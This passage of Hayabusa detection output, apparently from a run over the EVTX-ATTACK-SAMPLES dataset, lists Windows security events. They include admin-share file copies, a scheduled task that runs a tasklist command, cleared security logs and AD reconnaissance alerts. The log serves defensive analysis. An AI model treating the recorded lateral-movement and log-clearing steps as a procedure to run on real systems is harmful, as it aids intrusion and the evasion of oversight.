Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:56.403 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:56.414 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:58.386 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.105 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.115 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.115 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.115 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.630 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.700 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.913 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.913 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.923 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.933 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.063 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 22:15:36.036 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.583 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.614 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.614 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.692 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 23:23:37.147 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:43.570 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.491 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.507 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.522 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.522 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.538 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.538 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:57.397 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:57.397 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:07.601 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:07.601 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.413 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.413 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.741 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.741 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:15.647 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:15.662 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:15.662 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 00:02:00.383 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.179 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.210 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.210 +00:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.210 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.257 +00:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.257 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.319 +00:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 00:02:04.319 +00:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.335 +00:00,WIN-77LTAPHIQ1R.example.corp,4688,low,Disc,Suspicious Tasklist Discovery Command,,rules/sigma/process_creation_builtin/proc_creation_win_susp_tasklist_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.367 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.398 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.398 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.430 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.445 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.508 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.523 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:16.835 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:17.117 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:17.117 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 